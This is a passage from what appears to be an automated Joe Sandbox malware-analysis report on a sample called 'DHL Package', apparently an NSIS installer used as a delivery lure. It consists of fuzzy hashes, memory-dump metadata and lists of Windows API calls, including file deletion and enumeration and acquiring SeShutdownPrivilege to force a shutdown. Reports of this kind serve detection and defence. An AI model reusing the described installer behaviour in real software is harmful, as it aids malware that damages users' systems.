                                                                                                • Opcode ID: d01ee769d5ef0bb96239e3243a10cb67bfc57e577aedc808aa03c0c396cd419d
                                                                                                • Instruction ID: 644886876243780d7c0b122d810551b42772b117b8b1f09b86c3260f1418782c
                                                                                                • Opcode Fuzzy Hash: d01ee769d5ef0bb96239e3243a10cb67bfc57e577aedc808aa03c0c396cd419d
                                                                                                • Instruction Fuzzy Hash: C7119ABA3082009FD714CFA9D454E46B7F6EF887A1F21806AE1098B361CF71EC04CB51
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6200de82e457dcaf8511edace0970f6583cdaedc148ef828885789028e5fb8b3
                                                                                                • Instruction ID: 0ffaa5e1b71a44a211598fb09b34a65f6b6cac791bed229afe656cff72b7fb55
                                                                                                • Opcode Fuzzy Hash: 6200de82e457dcaf8511edace0970f6583cdaedc148ef828885789028e5fb8b3
                                                                                                • Instruction Fuzzy Hash: 9011A3F5E153098FDB14EFB8C44069EBBF5AB88690B50413AC41AE3301EB329D45C7D2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0b0c541af4681e4580a31625701a29810ad0ecb36ad1fac4b3c1b58f236397fa
                                                                                                • Instruction ID: c6161f6ee90134bc0c711024fdc7101eed5460e83ae4cbd370a25891c648884c
                                                                                                • Opcode Fuzzy Hash: 0b0c541af4681e4580a31625701a29810ad0ecb36ad1fac4b3c1b58f236397fa
                                                                                                • Instruction Fuzzy Hash: 761147B680424A9FDB10CF99D844BDEBBF5EF48320F10841AE528A7240C375A554DFA5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6899f2aa46faff7abc351edc04c10d2c8a576763950f4807750a2c875e2bf429
                                                                                                • Instruction ID: bb6f3522d78fcb87646af50002e81c3334af4d1a99622ec09363199f58a832ea
                                                                                                • Opcode Fuzzy Hash: 6899f2aa46faff7abc351edc04c10d2c8a576763950f4807750a2c875e2bf429
                                                                                                • Instruction Fuzzy Hash: 6B014E31704255AFDF06CB649820AEF3FA7DBC7751B09406AF844CB151DA318C0A97A1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fa0bd56ef1fcdeb59261b0dd99ed8d12b17ddd8a79f0d301f1857aed45004341
                                                                                                • Instruction ID: 56ca8e7c58e79e88c52fb6e3d1109db7f32d4bc84525682a6635752851af1a47
                                                                                                • Opcode Fuzzy Hash: fa0bd56ef1fcdeb59261b0dd99ed8d12b17ddd8a79f0d301f1857aed45004341
                                                                                                • Instruction Fuzzy Hash: 1E117CB680024ADFDB10CF99D844BEEBFF5EF48310F10841AE528A7240C335A555DFA4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b104f82f90c0dca0d81a9127ebe3164a6bccf8d9a0db33320f86768a5b833382
                                                                                                • Instruction ID: 37afdef0207ae0186eda292261a11b797c1314b1bf66ada8e4a667bfaf4d20a6
                                                                                                • Opcode Fuzzy Hash: b104f82f90c0dca0d81a9127ebe3164a6bccf8d9a0db33320f86768a5b833382
                                                                                                • Instruction Fuzzy Hash: 00112A74F0424ACFEB04DFF8D840BDEBBB6AB88355F008062E518A7345E6749D458B51
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6241901953.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_ad000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3801642b371ce085c7fc59adc94de6b5c3728a0055d3e49626c6dff1a83e2599
                                                                                                • Instruction ID: 4243c8f205e3fdb7cebca79841abd0b96199b8aa3e9acaf22991fb5d654d4d63
                                                                                                • Opcode Fuzzy Hash: 3801642b371ce085c7fc59adc94de6b5c3728a0055d3e49626c6dff1a83e2599
                                                                                                • Instruction Fuzzy Hash: 3611D075504280DFCB11CF50D5C4B15BBA2FB85314F24CAAED8494B652C33AD85ACF52
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7795c348b088260593e8f77fcba698c8710c667b53333b300818b213448535af
                                                                                                • Instruction ID: eec49805fd8c7b8dae0fa101b3b21d48f07d0abb5f9072a2f64fb0688e4a1b46
                                                                                                • Opcode Fuzzy Hash: 7795c348b088260593e8f77fcba698c8710c667b53333b300818b213448535af
                                                                                                • Instruction Fuzzy Hash: A11175B6B402118FD760EF38D80896A3BF4FF8925971106ADE519EB361EB31D802CBD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5d503101c2192e77144f93817659002638c5f24f06a86d5cfa80bd8d4685e56e
                                                                                                • Instruction ID: 05a82b1576ca3c811440a3a5fe02f1c7bcced415369ffe8e892944fcc682e839
                                                                                                • Opcode Fuzzy Hash: 5d503101c2192e77144f93817659002638c5f24f06a86d5cfa80bd8d4685e56e
                                                                                                • Instruction Fuzzy Hash: F60192BA904258AFCB119F64DC449EFBFF4FF49351B04812AED6993261D7305A14CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 13e2057b0afc56f9accdeacc3e3f574932ce66cbf2421345f882b407f8daa0bc
                                                                                                • Instruction ID: b3c6f415ad7415076604cdbf4cc69781abc956c64ba435742a284a04be478870
                                                                                                • Opcode Fuzzy Hash: 13e2057b0afc56f9accdeacc3e3f574932ce66cbf2421345f882b407f8daa0bc
                                                                                                • Instruction Fuzzy Hash: 710152B5A00209DFDF049FB5DC486AF7BB5FF88350B00453AED1593290DB309A10CBA1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3ca9f01fe4e2e02f876ba0a3a2bd20a4c55e42212ec9b07b10b76dc550217f3e
                                                                                                • Instruction ID: c58c913f0b283e970a0a83f323daed1aa1cdfb5a5734f60e87cd693396dd1e15
                                                                                                • Opcode Fuzzy Hash: 3ca9f01fe4e2e02f876ba0a3a2bd20a4c55e42212ec9b07b10b76dc550217f3e
                                                                                                • Instruction Fuzzy Hash: FFF0F6B2B4C6505FC71A4B29A41499E7BA5DFC666171400ABD00ADB3A1CE71DC078791
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 72f8fb4f44f3147f84d6095c5ca1f78e19ff2477e33883cd854a3e0346eb3543
                                                                                                • Instruction ID: 23f2dd20007299efaa246ae6685d61ea93b8e75d87abff3248a96dbb56880a18
                                                                                                • Opcode Fuzzy Hash: 72f8fb4f44f3147f84d6095c5ca1f78e19ff2477e33883cd854a3e0346eb3543
                                                                                                • Instruction Fuzzy Hash: A6F09071A04308AFDB90EFA9D841ADFBFF9FB98390B104526E519D7240E7305916CBA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a793d88b3999db114d8176372e1770eff1ae9a8bdbe2364293ad6711e939a9ed
                                                                                                • Instruction ID: 512627ecb09c673b827db4fd7bfdca3312f1dae5bdfc3862d58411e9be793c0c
                                                                                                • Opcode Fuzzy Hash: a793d88b3999db114d8176372e1770eff1ae9a8bdbe2364293ad6711e939a9ed
                                                                                                • Instruction Fuzzy Hash: 56F03A35304205DFD7008F6AD888D5ABBEAFF88761761816AE5198B330CB71EC15CB80
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 457c7f68659bba948c8ea99cf29cdf41f8ba648bb9053b38aa3604878ca01d92
                                                                                                • Instruction ID: 447024a6fd059bf52521e94aa2f66186d039da92636aa38ae0abe10ab0bf12fc
                                                                                                • Opcode Fuzzy Hash: 457c7f68659bba948c8ea99cf29cdf41f8ba648bb9053b38aa3604878ca01d92
                                                                                                • Instruction Fuzzy Hash: 56E02B34C04604EBDF00DBB6E8083EAB7B5EBCB302F405439D504A7124D7785519CFA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0d0a019ef9ccbda99b63b8ef696ef34acd1421802498cbb899ebe6885c44355
                                                                                                • Instruction ID: 9cfdd5459f31d3e46fd238a96dd9f768e77aa83c5b0e6ae76f3ce2bc7b0263fb
                                                                                                • Opcode Fuzzy Hash: a0d0a019ef9ccbda99b63b8ef696ef34acd1421802498cbb899ebe6885c44355
                                                                                                • Instruction Fuzzy Hash: 6EF0F478E19348EFDB01DFB4945168DBFB0AF8A200F5091AAD844AB261D7785A4ACF41
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2616fb5835d8662166188a427139f39c15131deb42c46c27e8c8009f73c5817a
                                                                                                • Instruction ID: 5cb3815110e26c1576369a924994816591b4dd5a5ad51cc10969e4d8eb306d6b
                                                                                                • Opcode Fuzzy Hash: 2616fb5835d8662166188a427139f39c15131deb42c46c27e8c8009f73c5817a
                                                                                                • Instruction Fuzzy Hash: 82F01778D08348AFCB05DFB5991169DBBF4AB8A300F4081EA9844E7255DB345A45CF81
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6f3a01bd775b347b8403b7f72827d9463bf8f09bf3eb2fc92cc5791fc3df2811
                                                                                                • Instruction ID: 47c0329500061d8b4f95224cc72f569eb0fd7c041620e8345c0b23ab0aa7b088
                                                                                                • Opcode Fuzzy Hash: 6f3a01bd775b347b8403b7f72827d9463bf8f09bf3eb2fc92cc5791fc3df2811
                                                                                                • Instruction Fuzzy Hash: C4F01738D09308EFDB01DFA8D45128DBBB0AF86300F5081AAD854EB365D7344A45CF81
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 05b70e644b1ca87f1878695828ef8d10eb20097ff8f696657f771ad9a5604a06
                                                                                                • Instruction ID: 539a382c6fb216cb2ee1de1522436b9fd12ad6d9a7c07065c532e53390841866
                                                                                                • Opcode Fuzzy Hash: 05b70e644b1ca87f1878695828ef8d10eb20097ff8f696657f771ad9a5604a06
                                                                                                • Instruction Fuzzy Hash: BBE092319153AA5FC703ABB9DC105DEBF349E9722074545E7D094AB092EA302A4DC3B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 644e9da6f37a60a0bca4bbb2565ce1e30135803b55fe7aed9e7efb316effefad
                                                                                                • Instruction ID: a3bb945e1d79ce66fb1769f31be3dacd394d2348af24e6e06c49066a229cd746
                                                                                                • Opcode Fuzzy Hash: 644e9da6f37a60a0bca4bbb2565ce1e30135803b55fe7aed9e7efb316effefad
                                                                                                • Instruction Fuzzy Hash: CCE0D893C09140DBD72187A268150B97B30D9D7342B446487D8599F425D728C61A9B12
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7ed7d9d752c2936695c7d384c3256b991eeb5e387bf33ca048101d7dd0c21779
                                                                                                • Instruction ID: 22bdd1527f39a6e4f68990700845109d83c6268be71063273fd0eb3ec1894f0e
                                                                                                • Opcode Fuzzy Hash: 7ed7d9d752c2936695c7d384c3256b991eeb5e387bf33ca048101d7dd0c21779
                                                                                                • Instruction Fuzzy Hash: 24D01231D2022A978B00AAA9DC044DEBB38EED6321B504626D51437140EB70265986E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2a2f002181fbd96e442e6d3dcffe0602afbc15d346ef19c8aa2e65e349e6b4eb
                                                                                                • Instruction ID: 9bc12a2f2c223091fff994e6970c4ef121ef5eb7a8eb272c5ef64ccded414bcc
                                                                                                • Opcode Fuzzy Hash: 2a2f002181fbd96e442e6d3dcffe0602afbc15d346ef19c8aa2e65e349e6b4eb
                                                                                                • Instruction Fuzzy Hash: B9C0123354D0646DD725409E3C40EFB5F4CD2C13B5A35027BF86DE714098424C4545A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3f7aedf8595a09b32445fe79d3e103e5d091aa9aae830f506cfa4f27a07f2436
                                                                                                • Instruction ID: 2bea6e6467d963234f776cd83560336e74d7c4473e95260a524d107e794df465
                                                                                                • Opcode Fuzzy Hash: 3f7aedf8595a09b32445fe79d3e103e5d091aa9aae830f506cfa4f27a07f2436
                                                                                                • Instruction Fuzzy Hash: 78D0C937304128BB4B052B99BC19CAE7B6EFBD97717048027F91983710CE719D5297E5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c1d521b383939f7b0e04c3884fb4509bdef529365c1d6011e14266efc91e7e6
                                                                                                • Instruction ID: 5c9efe974561aadd091f3e6b4235e7f8bf0cc92fda23fa9e18213a652e7d24c6
                                                                                                • Opcode Fuzzy Hash: 8c1d521b383939f7b0e04c3884fb4509bdef529365c1d6011e14266efc91e7e6
                                                                                                • Instruction Fuzzy Hash: C9D0673AB00008EBDF04DF98EC40DDDB7B6FB9C221B048126E915A3260C6319921DB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 692fe0e67be4335183b5ee82a88dd4c06be88d60d763254a98ede6bc03101eac
                                                                                                • Instruction ID: ca2dfa39b4a9a4a4fa3fc9287557fcea83f007337fdbe4d4a469ad28eab0672a
                                                                                                • Opcode Fuzzy Hash: 692fe0e67be4335183b5ee82a88dd4c06be88d60d763254a98ede6bc03101eac
                                                                                                • Instruction Fuzzy Hash: 59C0127016070A47E9C1F7B1D85799677AAAFC0214F504414B0090916A9E7C5916DBA5
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32 ref: 004034B2
                                                                                                • GetVersion.KERNEL32 ref: 004034B8
                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034EB
                                                                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403528
                                                                                                • OleInitialize.OLE32(00000000), ref: 0040352F
                                                                                                • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 0040354B
                                                                                                • GetCommandLineW.KERNEL32(00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 00403560
                                                                                                • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000007,00000009,0000000B), ref: 00403598
                                                                                                  • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                                                  • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                                                • GetTempPathW.KERNEL32(00000400,00437800,?,00000007,00000009,0000000B), ref: 004036D2
                                                                                                • GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000007,00000009,0000000B), ref: 004036E3
                                                                                                • lstrcatW.KERNEL32(00437800,\Temp), ref: 004036EF
                                                                                                • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000007,00000009,0000000B), ref: 00403703
                                                                                                • lstrcatW.KERNEL32(00437800,Low), ref: 0040370B
                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000007,00000009,0000000B), ref: 0040371C
                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000007,00000009,0000000B), ref: 00403724
                                                                                                • DeleteFileW.KERNEL32(00437000,?,00000007,00000009,0000000B), ref: 00403738
                                                                                                  • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                                                • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403803
                                                                                                • ExitProcess.KERNEL32 ref: 00403824
                                                                                                • lstrcatW.KERNEL32(00437800,~nsu), ref: 00403837
                                                                                                • lstrcatW.KERNEL32(00437800,0040A26C), ref: 00403846
                                                                                                • lstrcatW.KERNEL32(00437800,.tmp), ref: 00403851
                                                                                                • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000007,?,00000007,00000009,0000000B), ref: 0040385D
                                                                                                • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000007,00000009,0000000B), ref: 00403879
                                                                                                • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 004038D3
                                                                                                • CopyFileW.KERNEL32(00438800,00420EC8,00000001,?,00000007,00000009,0000000B), ref: 004038E7
                                                                                                • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000,?,00000007,00000009,0000000B), ref: 00403914
                                                                                                • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403943
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040394A
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395F
                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403982
                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A7
                                                                                                • ExitProcess.KERNEL32 ref: 004039CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                • API String ID: 3441113951-3195845224
                                                                                                • Opcode ID: e1b85bccdae587764f7fe1a1fb27296d24799a3053249338d16195b886ff37fe
                                                                                                • Instruction ID: 80ab2d28ddbf02fe5cd82fe477cea5b095f50d567d4594062ccc97c7db5cb5a9
                                                                                                • Opcode Fuzzy Hash: e1b85bccdae587764f7fe1a1fb27296d24799a3053249338d16195b886ff37fe
                                                                                                • Instruction Fuzzy Hash: 32D107B0204310ABD7207F659E45A3B3AACEB4470AF11447FF481F62E1DBBD8956876E
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(?,?,77163420,00437800,00000000), ref: 00405B16
                                                                                                • lstrcatW.KERNEL32(00425710,\*.*), ref: 00405B5E
                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405B81
                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,77163420,00437800,00000000), ref: 00405B87
                                                                                                • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,77163420,00437800,00000000), ref: 00405B97
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C37
                                                                                                • FindClose.KERNEL32(00000000), ref: 00405C46
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 2035342205-1173974218
                                                                                                • Opcode ID: 4a9a22c29218aab3c5ab50421185d04963702c080e01836bd37a1bf3e254f337
                                                                                                • Instruction ID: 6d977be599016ad98dbda8fdbba8a7eaa4df1add9cdfb0a4bac278b573c77b22
                                                                                                • Opcode Fuzzy Hash: 4a9a22c29218aab3c5ab50421185d04963702c080e01836bd37a1bf3e254f337
                                                                                                • Instruction Fuzzy Hash: 1A41D530904A18AAEB216B65DC8AABF7678EF41718F10413FF801B11D1D77C5AC1DEAE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
                                                                                                • Instruction ID: 1b8bdd5ad4fc83de7ba6cec7d94a6212227b50c179fbf06187fd9840cc1d6bdc
                                                                                                • Opcode Fuzzy Hash: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
                                                                                                • Instruction Fuzzy Hash: 44F18770D04229CBDF18CFA8C8946ADBBB1FF45305F25816ED852BB281D7386A86DF45
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(77163420,00426758,00425F10,00405E01,00425F10,00425F10,00000000,00425F10,00425F10,77163420,?,00437800,00405B0D,?,77163420,00437800), ref: 00406744
                                                                                                • FindClose.KERNEL32(00000000), ref: 00406750
                                                                                                Strings
                                                                                                Memory Dump Source
